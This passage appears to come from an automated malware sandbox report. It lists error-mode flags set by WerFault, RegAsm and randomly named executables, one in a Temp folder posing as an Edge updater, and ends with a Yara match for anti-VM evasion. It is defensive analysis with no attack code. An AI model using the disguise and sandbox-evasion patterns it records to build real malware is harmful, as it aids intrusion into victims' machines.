Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userEHJDHJKFIE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAKKEGCAAE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\GHDHDBAECG.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\CBFIIEHJDB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\KEHDBAEGII.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userDHDAFBFCFH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userCAAKKFHCFI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 12.2.9nou8XrciU9ATc03f2Eu4OO2.exe.3e15570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.9nou8XrciU9ATc03f2Eu4OO2.exe.3e15570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.2527499922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
